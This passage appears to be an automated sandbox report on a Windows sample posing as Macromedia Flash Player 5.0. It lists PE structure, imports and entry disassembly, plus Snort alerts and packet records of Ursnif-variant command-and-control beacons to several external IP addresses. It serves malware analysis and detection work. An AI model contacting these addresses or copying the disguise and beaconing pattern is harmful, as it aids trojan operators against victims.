                            add esp, FFFFFFE0h
                            push 00000331h
                            pop dword ptr [100B4A09h]
                            push FFFFFFD5h
                            push 00000000h
                            call dword ptr [100A0210h]
                            mov ebx, eax
                            cmp eax, 00000000h
                            jne 00007F00C0EA0154h

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x9d23a0x53.text
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x9f0000xa0.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd30000x4314.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0xc94000x34c0.data
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000x404.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x9d16b0x9d200False0.453602016209data5.83972572833IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .rdata0x9f0000xa00x200False0.162109375data0.956109122852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xa00000x32b9d0x26600False0.3382596193data5.89460340701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc0xd30000x43140x4400False0.270392922794data4.09705402887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xd80000x4040x600False0.591796875data5.03744548477IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_CURSOR0xd36b80x134dataEnglishUnited States
                            RT_CURSOR0xd37ec0xb4dataEnglishUnited States
                            RT_CURSOR0xd38a00x134dataEnglishUnited States
                            RT_CURSOR0xd39d40xb4dataEnglishUnited States
                            RT_CURSOR0xd3a880x134dataEnglishUnited States
                            RT_ICON0xd3bbc0x2e8dataEnglishUnited States
                            RT_ICON0xd3ea40x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xd3fcc0xb0GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xd407c0x130dataEnglishUnited States
                            RT_ICON0xd41ac0x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xd47140x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 16776176, next used block 10526884EnglishUnited States
                            RT_ICON0xd4fbc0x2e8dataEnglishUnited States
                            RT_ICON0xd52a40x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xd53cc0xb0GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xd547c0x130dataEnglishUnited States
                            RT_ICON0xd55ac0x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xd5b140x8a8dataEnglishUnited States
                            RT_MENU0xd63bc0x300dataEnglishUnited States
                            RT_MENU0xd66bc0x190dataEnglishUnited States
                            RT_MENU0xd684c0x86dataEnglishUnited States
                            RT_DIALOG0xd68d40x192dataEnglishUnited States
                            RT_DIALOG0xd6a680x1cadataEnglishUnited States
                            RT_STRING0xd6c340xc6dataEnglishUnited States
                            RT_STRING0xd6cfc0x176dataEnglishUnited States
                            RT_ACCELERATOR0xd6e740x60dataEnglishUnited States
                            RT_GROUP_CURSOR0xd6ed40x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                            RT_GROUP_CURSOR0xd6ef80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xd6f0c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                            RT_GROUP_ICON0xd6f300x5adataEnglishUnited States
                            RT_GROUP_ICON0xd6f8c0x5adataEnglishUnited States
                            RT_VERSION0xd6fe80x32cdataEnglishUnited States

                            Imports

                            DLLImport
                            advapi32.dllTraceMessage, GetTraceLoggerHandle, GetTraceEnableLevel, RegOpenKeyExW, UnregisterTraceGuids, RegisterTraceGuidsW, RegQueryValueExW, RegCloseKey, GetTraceEnableFlags, ConvertStringSidToSidW, RevertToSelf
                            gdi32.dllDeleteObject
                            kernel32.dllInterlockedExchange, InterlockedDecrement, WaitForSingleObject, WriteFile, HeapSetInformation, GetCurrentProcess, QueryPerformanceCounter, ReadFile, InterlockedCompareExchange, CreateThread, GetModuleHandleA, EnterCriticalSection, SetUnhandledExceptionFilter, Sleep, LoadLibraryA, LoadLibraryExW, SetEvent, GetProcAddress, UnhandledExceptionFilter, GetCurrentProcessId, CreateEventW, CreateFileW, TlsSetValue, GetTickCount, GetLastError, GetSystemDirectoryW, LocalAlloc, CloseHandle, InitializeCriticalSectionAndSpinCount, BindIoCompletionCallback, RaiseException, LocalFree, DeleteCriticalSection, TlsFree, OutputDebugStringA, GetCurrentThread, GetCurrentThreadId, LeaveCriticalSection, TlsAlloc, TlsGetValue, DeviceIoControl, InterlockedIncrement, TerminateProcess, VirtualProtectEx, FreeLibrary
                            msvcrt.dll_purecall, memcpy, _cexit, _wcsicmp, __winitenv, wcsncmp, _vsnwprintf, _onexit, _unlock, __set_app_type, _exit, _controlfp, __wgetmainargs, _amsg_exit, __setusermatherr, __dllonexit, memset, exit, _wcsnicmp, _lock, _XcptFilter, _errno, _initterm
                            ntdll.dllRtlUnwind
                            ole32.dllCLSIDFromString, CoUninitialize, CoInitializeEx
                            rpcrt4.dllUuidFromStringW

                            Exports

                            NameOrdinalAddress
                            DllRegisterServer10x1009b929

                            Version Infos

                            DescriptionData
                            LegalCopyrightCopyright 1996-2000 Macromedia, Inc.
                            InternalNameFlash
                            FileVersion5,0,30,0
                            CompanyNameMacromedia, Inc.
                            LegalTrademarksFlash
                            ProductNameFlash 5.0
                            ProductVersion5,0,30,0
                            FileDescriptionFlash Player 5.0 r30
                            OriginalFilenameSwFlsh32.exe
                            Translation0x0409 0x04b0

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            01/12/22-11:10:57.883001TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976580192.168.2.631.41.45.66
                            01/12/22-11:10:57.883001TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976580192.168.2.631.41.45.66
                            01/12/22-11:10:59.589113TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976680192.168.2.631.41.45.66
                            01/12/22-11:10:59.589113TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976680192.168.2.631.41.45.66
                            01/12/22-11:10:59.592691TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976980192.168.2.631.41.45.66
                            01/12/22-11:10:59.592691TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976980192.168.2.631.41.45.66
                            01/12/22-11:10:59.650344TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976780192.168.2.631.41.45.66
                            01/12/22-11:10:59.650344TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976780192.168.2.631.41.45.66
                            01/12/22-11:10:59.779409TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977080192.168.2.631.41.45.66
                            01/12/22-11:10:59.779409TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977080192.168.2.631.41.45.66
                            01/12/22-11:10:59.843786TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977180192.168.2.631.41.45.66
                            01/12/22-11:10:59.843786TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977180192.168.2.631.41.45.66
                            01/12/22-11:10:59.974315TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977280192.168.2.631.41.45.66
                            01/12/22-11:10:59.974315TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977280192.168.2.631.41.45.66
                            01/12/22-11:11:00.035781TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977380192.168.2.631.41.45.66
                            01/12/22-11:11:00.035781TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977380192.168.2.631.41.45.66
                            01/12/22-11:11:00.163161TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977480192.168.2.631.41.45.66
                            01/12/22-11:11:00.163161TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977480192.168.2.631.41.45.66
                            01/12/22-11:11:43.259551TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978580192.168.2.6162.255.119.219
                            01/12/22-11:11:43.259551TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978580192.168.2.6162.255.119.219
                            01/12/22-11:11:44.520803TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978780192.168.2.6198.54.117.215
                            01/12/22-11:11:44.520803TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978780192.168.2.6198.54.117.215
                            01/12/22-11:11:44.731028TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978880192.168.2.631.41.45.66
                            01/12/22-11:11:44.731028TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978880192.168.2.631.41.45.66
                            01/12/22-11:11:44.748245TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979180192.168.2.631.41.45.66
                            01/12/22-11:11:44.748245TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979180192.168.2.631.41.45.66
                            01/12/22-11:11:44.765625TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979280192.168.2.631.41.45.66
                            01/12/22-11:11:44.765625TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979280192.168.2.631.41.45.66
                            01/12/22-11:11:44.797044TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978980192.168.2.631.41.45.66
                            01/12/22-11:11:44.797044TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978980192.168.2.631.41.45.66
                            01/12/22-11:11:44.826482TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979380192.168.2.631.41.45.66
                            01/12/22-11:11:44.826482TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979380192.168.2.631.41.45.66
                            01/12/22-11:11:44.924736TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979580192.168.2.631.41.45.66
                            01/12/22-11:11:44.924736TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979580192.168.2.631.41.45.66
                            01/12/22-11:11:44.953395TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979780192.168.2.631.41.45.66
                            01/12/22-11:11:44.953395TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979780192.168.2.631.41.45.66
                            01/12/22-11:12:13.048057TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4984580192.168.2.631.41.45.66
                            01/12/22-11:12:13.048057TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4984580192.168.2.631.41.45.66
                            01/12/22-11:12:14.734502TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4984780192.168.2.6162.255.119.219
                            01/12/22-11:12:14.734502TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4984780192.168.2.6162.255.119.219
                            01/12/22-11:12:14.809456TCP1478WEB-CGI swc access4984880192.168.2.6162.255.119.219
                            01/12/22-11:12:14.809456TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4984880192.168.2.6162.255.119.219
                            01/12/22-11:12:14.809456TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4984880192.168.2.6162.255.119.219
                            01/12/22-11:12:15.136485TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985280192.168.2.6198.54.117.215
                            01/12/22-11:12:15.136485TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985280192.168.2.6198.54.117.215
                            01/12/22-11:12:15.256762TCP1478WEB-CGI swc access4985780192.168.2.6198.54.117.215
                            01/12/22-11:12:15.256762TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985780192.168.2.6198.54.117.215
                            01/12/22-11:12:15.256762TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985780192.168.2.6198.54.117.215
                            01/12/22-11:12:15.312348TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985380192.168.2.6198.54.117.215
                            01/12/22-11:12:15.312348TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985380192.168.2.6198.54.117.215
                            01/12/22-11:12:15.431628TCP1478WEB-CGI swc access4985680192.168.2.6198.54.117.215
                            01/12/22-11:12:15.431628TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985680192.168.2.6198.54.117.215
                            01/12/22-11:12:15.431628TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985680192.168.2.6198.54.117.215
                            01/12/22-11:12:15.666459TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985880192.168.2.6198.54.117.215
                            01/12/22-11:12:15.666459TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985880192.168.2.6198.54.117.215
                            01/12/22-11:12:15.785577TCP1478WEB-CGI swc access4986080192.168.2.6198.54.117.215
                            01/12/22-11:12:15.785577TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986080192.168.2.6198.54.117.215
                            01/12/22-11:12:15.785577TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986080192.168.2.6198.54.117.215
                            01/12/22-11:12:15.839486TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985980192.168.2.6198.54.117.215
                            01/12/22-11:12:15.839486TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985980192.168.2.6198.54.117.215
                            01/12/22-11:12:15.962328TCP1478WEB-CGI swc access4986180192.168.2.6198.54.117.215
                            01/12/22-11:12:15.962328TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986180192.168.2.6198.54.117.215
                            01/12/22-11:12:15.962328TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986180192.168.2.6198.54.117.215
                            01/12/22-11:12:16.195594TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986280192.168.2.6198.54.117.215
                            01/12/22-11:12:16.195594TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986280192.168.2.6198.54.117.215
                            01/12/22-11:12:16.440666TCP1478WEB-CGI swc access4986480192.168.2.6198.54.117.215
                            01/12/22-11:12:16.440666TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986480192.168.2.6198.54.117.215
                            01/12/22-11:12:16.440666TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986480192.168.2.6198.54.117.215
                            01/12/22-11:12:16.446784TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986380192.168.2.6198.54.117.215
                            01/12/22-11:12:16.446784TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986380192.168.2.6198.54.117.215
                            01/12/22-11:12:16.636423TCP1478WEB-CGI swc access4986580192.168.2.6198.54.117.215
                            01/12/22-11:12:16.636423TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986580192.168.2.6198.54.117.215
                            01/12/22-11:12:16.636423TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986580192.168.2.6198.54.117.215
                            01/12/22-11:12:16.796151TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986880192.168.2.6198.54.117.215
                            01/12/22-11:12:16.796151TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986880192.168.2.6198.54.117.215
                            01/12/22-11:12:16.988873TCP1478WEB-CGI swc access4987080192.168.2.6198.54.117.215
                            01/12/22-11:12:16.988873TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4987080192.168.2.6198.54.117.215
                            01/12/22-11:12:16.988873TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4987080192.168.2.6198.54.117.215
                            01/12/22-11:12:38.854724TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4989280192.168.2.6162.255.119.219
                            01/12/22-11:12:40.263114TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4989880192.168.2.6198.54.117.210
                            01/12/22-11:12:40.439151TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4989780192.168.2.6198.54.117.210
                            01/12/22-11:12:40.802409TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4990080192.168.2.6198.54.117.210
                            01/12/22-11:12:40.978363TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4990180192.168.2.6198.54.117.210
                            01/12/22-11:12:41.338093TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4990580192.168.2.6198.54.117.210
                            01/12/22-11:12:41.511206TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4990480192.168.2.6198.54.117.210
                            01/12/22-11:12:41.882502TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4990680192.168.2.6198.54.117.210
                            01/12/22-11:12:44.908284TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4991080192.168.2.631.41.45.66
                            01/12/22-11:12:44.908284TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4991080192.168.2.631.41.45.66
                            01/12/22-11:12:44.904131TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4990880192.168.2.631.41.45.66
                            01/12/22-11:12:44.970628TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4990980192.168.2.631.41.45.66
                            01/12/22-11:12:44.981507TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4991280192.168.2.631.41.45.66
                            01/12/22-11:12:44.983144TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4991180192.168.2.631.41.45.66
                            01/12/22-11:12:44.983144TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4991180192.168.2.631.41.45.66
                            01/12/22-11:12:45.043011TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4991380192.168.2.631.41.45.66
                            01/12/22-11:12:45.107233TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4991780192.168.2.631.41.45.66
                            01/12/22-11:12:45.107233TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4991780192.168.2.631.41.45.66
                            01/12/22-11:12:45.103502TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4991580192.168.2.631.41.45.66
                            01/12/22-11:12:45.180744TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4991980192.168.2.631.41.45.66
                            01/12/22-11:13:08.437654TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992180192.168.2.631.41.45.66
                            01/12/22-11:13:08.501137TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992280192.168.2.631.41.45.66
                            01/12/22-11:13:08.626446TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992480192.168.2.631.41.45.66
                            01/12/22-11:13:09.571500TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4992580192.168.2.6162.255.119.219
                            01/12/22-11:13:09.571500TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992580192.168.2.6162.255.119.219
                            01/12/22-11:13:09.937128TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4992680192.168.2.6162.255.119.219
                            01/12/22-11:13:09.937128TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992680192.168.2.6162.255.119.219
                            01/12/22-11:13:09.989888TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4992780192.168.2.6162.255.119.219
                            01/12/22-11:13:09.989888TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992780192.168.2.6162.255.119.219
                            01/12/22-11:13:10.310664TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4992880192.168.2.6198.54.117.212
                            01/12/22-11:13:10.310664TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992880192.168.2.6198.54.117.212
                            01/12/22-11:13:10.361734TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4992980192.168.2.6198.54.117.216
                            01/12/22-11:13:10.361734TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992980192.168.2.6198.54.117.216
                            01/12/22-11:13:10.386160TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4993080192.168.2.6198.54.117.216
                            01/12/22-11:13:10.386160TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993080192.168.2.6198.54.117.216
                            01/12/22-11:13:30.640811TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4993280192.168.2.631.41.45.66
                            01/12/22-11:13:30.672809TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4993380192.168.2.631.41.45.66
                            01/12/22-11:13:30.672809TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993380192.168.2.631.41.45.66
                            01/12/22-11:13:31.926413TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4993580192.168.2.6162.255.119.219
                            01/12/22-11:13:32.315131TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4993680192.168.2.6198.54.117.216
                            01/12/22-11:13:50.720366TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4992580192.168.2.6162.255.119.219
                            01/12/22-11:13:50.720366TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992580192.168.2.6162.255.119.219
                            01/12/22-11:13:50.752180TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4992680192.168.2.6162.255.119.219
                            01/12/22-11:13:50.752180TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992680192.168.2.6162.255.119.219
                            01/12/22-11:13:50.798544TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992780192.168.2.6162.255.119.219
                            01/12/22-11:13:51.071866TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4993780192.168.2.6198.54.117.212
                            01/12/22-11:13:51.071866TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993780192.168.2.6198.54.117.212
                            01/12/22-11:13:51.111266TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4993880192.168.2.6198.54.117.216
                            01/12/22-11:13:51.111266TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993880192.168.2.6198.54.117.216
                            01/12/22-11:13:51.159193TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993980192.168.2.6198.54.117.216
                            01/12/22-11:13:52.655339TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4994180192.168.2.631.41.45.66
                            01/12/22-11:14:11.318597TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4994280192.168.2.631.41.45.66
                            01/12/22-11:14:11.318597TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4994280192.168.2.631.41.45.66
                            01/12/22-11:14:11.369407TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4994380192.168.2.631.41.45.66
                            01/12/22-11:14:11.414874TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4994480192.168.2.631.41.45.66
                            01/12/22-11:14:12.738285TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993580192.168.2.6162.255.119.219
                            01/12/22-11:14:13.088994TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4994680192.168.2.6198.54.117.216
                            01/12/22-11:14:31.574065TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4992580192.168.2.6162.255.119.219
                            01/12/22-11:14:31.574065TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4992580192.168.2.6162.255.119.219
                            01/12/22-11:14:31.574891TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4992680192.168.2.6162.255.119.219
                            01/12/22-11:14:31.927917TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4994780192.168.2.6198.54.117.212
                            01/12/22-11:14:31.927917TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4994780192.168.2.6198.54.117.212
                            01/12/22-11:14:31.940590TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4994880192.168.2.6198.54.117.216
                            01/12/22-11:14:33.340958TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4995080192.168.2.631.41.45.66
                            01/12/22-11:14:52.178426TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4995280192.168.2.631.41.45.66
                            01/12/22-11:14:52.178426TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4995280192.168.2.631.41.45.66
                            01/12/22-11:14:52.181542TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4995180192.168.2.631.41.45.66
                            01/12/22-11:14:52.181542TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4995180192.168.2.631.41.45.66
                            01/12/22-11:14:52.197376TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4995380192.168.2.631.41.45.66
                            01/12/22-11:14:52.197376TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4995380192.168.2.631.41.45.66

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 12, 2022 11:10:57.769279003 CET4976580192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:57.769382954 CET4976480192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:57.829770088 CET804976531.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:57.829931974 CET4976580192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:57.830663919 CET804976431.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:57.830740929 CET4976480192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:57.883001089 CET4976580192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:57.944551945 CET804976531.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:57.944583893 CET804976531.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:57.945167065 CET4976580192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:57.952224970 CET4976580192.168.2.631.41.45.66
